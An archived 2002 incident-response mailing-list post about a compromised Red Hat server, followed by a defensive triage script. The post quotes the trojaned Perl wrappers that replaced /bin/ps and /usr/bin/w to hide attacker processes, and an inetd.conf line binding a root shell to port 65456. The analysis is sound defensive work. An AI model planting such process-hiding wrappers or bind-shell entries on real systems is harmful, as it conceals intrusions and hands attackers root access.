nouser - rootkit ?

From: Dan Uscatu (
Date: 02/11/02

From: "Dan Uscatu" <>
To: <>
Date: Mon, 11 Feb 2002 01:44:31 +0200

 I found something funny happening today when I tried to install a web
 on a customer's machine:
 1. w - returned some weird "/usr/bin/perl" processes
 2. ps - was not showing everything
 3. two connections to some IRC servers; fuser - found the process IDs for
 them, but ps did not show them

 Some info about the server (unfortunately it wasn't installed by me...):
 [root@www root]# uname -a
 Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
 the future too, lol)
 [root@www /root]# cat /etc/redhat-release
 Red Hat Linux release 7.1 (Seawolf)

 More digging... I found some modified files:

 [root@www nouser]# ls -l /bin/ps
 -rwxr-xr-x 1 nouser nouser 188 Mar 2 15:45 /bin/ps

 [root@www /root]# cat /bin/ps
 $xargs =join(' ',@ARGV);
 $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
 grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
 print "$ps";
 [root@www /root]# ls -l /usr/lib/libxnotps
 -r-xr-xr-x 1 root root 64092 Apr 5 2001 /usr/lib/libxnotps

 [root@www nouser]# ls -l /usr/bin/w
 -rwxr-xr-x 1 nouser nouser 105 Jan 20 01:03 /usr/bin/w

 [root@www /root]# cat /usr/bin/w
 $xargs =join(' ',@ARGV);
 $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
 print "$w";
 [root@www /root]# ls -l /usr/lib/libxyotps
 -r-xr-xr-x 1 root root 8688 Apr 5 2001 /usr/lib/libxyotps

 There is another file called /usr/lib/libxzotps, but I couldn't find what is
 pointing at that yet.
 No reference found on the web searching for "libxnotps" or "libxnotps" or

 [root@www nouser]# grep nouser /etc/passwd

 [root@www nouser]# ls -l /sbin/nouser
 total 3328
-rw-r--r-- 1 nouser nouser 80092 Mar 2 23:22 broadcast-5000.log
-rw-r--r-- 1 nouser nouser 3057793 Mar 2 23:22 broadcast-full.log
drwxr-xr-x 2 nouser nouser 4096 Mar 2 13:01 Desktop
drwxrwxr-x 4 nouser nouser 4096 Mar 5 19:23 iroffer
-rw-rw-r-- 1 nouser nouser 206865 Mar 5 19:23 iroffer.tar.gz
-rwsr-xr-x 1 root root 13855 Mar 2 13:04 nouser
-rw-rw-r-- 1 root root 2215 Mar 2 23:23
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:15 scan-1
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-2
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-3
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:13 war

 Of course the SUID "nouser" gives a root shell... and the directories are
full of war scripts, flood tools, and warez... given away through IRC bots.

I have scanned the machine using chkrootkit... the only funny thing found
was an inetd.conf containing:

 [root@www nouser]# cat /etc/inetd.conf
65456 stream tcp nowait root /bin/sh sh

 Of course, inetd is not installed :) That points me to the idea that the
process was somehow automated... but I can't find any reference to a rootkit
that does these changes. Seems pretty stupid for a rootkit anyway... but I
want to be sure no other major changes were made before I install the
production server there.

Thanks for any comments

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see:
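The two symptoms in the post (a Perl wrapper sitting where /bin/ps should be, piping the real binary through a chain of "grep -v", and processes that fuser sees but ps does not) can be checked mechanically. The script below is an added example, not part of the original post or of any tool the poster mentions. It embeds a constructed copy of the quoted /bin/ps wrapper as sample input; the function names, the classification labels and the /proc-versus-ps comparison are this example's own assumptions about how a responder would triage such a box.

```shell
#!/bin/sh
# Added example, not from the original post. Triage helpers for the two
# symptoms described there: /bin/ps and /usr/bin/w replaced by Perl wrappers
# that run the real binary and pipe it through "grep -v <pattern>" chains,
# and processes that /proc (or fuser) knows about but ps no longer lists.
# Function names and the /proc-versus-ps comparison are this example's own;
# the sample wrapper written by write_samples is a constructed copy of the
# /bin/ps quoted in the post.

# Classify a file that should be a compiled system binary:
#   elf     - starts with the ELF magic (what a genuine ps or w looks like)
#   wrapper - a script that filters some other program's output with grep -v
#   script  - any other non-ELF content where a binary was expected
#   missing - no such file
classify_binary() {
    [ -f "$1" ] || { echo missing; return 0; }
    magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    if [ "$magic" = "7f454c46" ]; then
        echo elf
    elif grep -q 'grep -v' "$1"; then
        echo wrapper
    else
        echo script
    fi
}

# Path the wrapper really executes: the first word inside its backticks.
real_binary() {
    sed -n 's/[^`]*`\([^ `]*\).*/\1/p' "$1" | head -n 1
}

# Strings the wrapper strips from the output, one per "grep -v TOKEN",
# with the escaping backslashes and quotes removed. For the quoted /bin/ps
# this yields: nouser noshell proftp /bin/ps libxnotps
hidden_patterns() {
    tr '|' '\n' < "$1" \
      | sed -n 's/.*grep -v[[:space:]]*\\*"*\([^"\\ `;]*\).*/\1/p' \
      | tr '\n' ' ' | sed 's/ $//'
}

# Owner as shown by ls -l (the post's wrappers were owned by "nouser").
owner_of() {
    ls -ld "$1" | awk '{print $3}'
}

# One-line verdict for a binary, in the spirit of the post's manual checks.
triage() {
    kind=$(classify_binary "$1")
    case "$kind" in
        wrapper)
            printf '%s: SUSPECT wrapper owned by %s, runs %s, hides: %s\n' \
                "$1" "$(owner_of "$1")" "$(real_binary "$1")" "$(hidden_patterns "$1")" ;;
        *)
            printf '%s: %s\n' "$1" "$kind" ;;
    esac
}

# PIDs present in an independent list ($1: /proc entries or fuser output)
# but absent from what ps printed ($2). Both lists are whitespace separated.
hidden_pids() {
    ps_list=" $(printf '%s' "$2" | tr '\n\t' '  ') "
    for p in $1; do
        case "$ps_list" in
            *" $p "*) ;;
            *) printf '%s\n' "$p" ;;
        esac
    done
}

# Live version for a Linux host. A short-lived process that exits between
# the two snapshots can appear here once; a PID that shows up on every run
# is the interesting one.
live_hidden_pids() {
    [ -d /proc ] && command -v ps >/dev/null 2>&1 || return 0
    hidden_pids "$(ls /proc | grep '^[0-9][0-9]*$')" "$(ps -e -o pid=)"
}

# Constructed samples: the wrapper quoted in the post and an ELF stand-in.
write_samples() {
    cat > "$1/ps" <<'EOF'
$xargs =join(' ',@ARGV);
$ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \| grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
print "$ps";
EOF
    printf '\177ELF\002\001\001 not a real binary' > "$1/ls"
}

demo() {
    d=$(mktemp -d)
    write_samples "$d"
    triage "$d/ps"
    triage "$d/ls"
    rm -rf "$d"
    # On the compromised box one would run triage over /bin/ps /usr/bin/w
    # /bin/ls /bin/netstat and friends, then compare against live_hidden_pids.
    live_hidden_pids
}

demo
```

Because the wrapper filters by substring, any process whose command line contains "nouser", "noshell", "proftp" or "libxnotps" disappears from ps; the real binary in /usr/lib still answers honestly, which is why fuser and a /proc listing disagree with ps on the same machine.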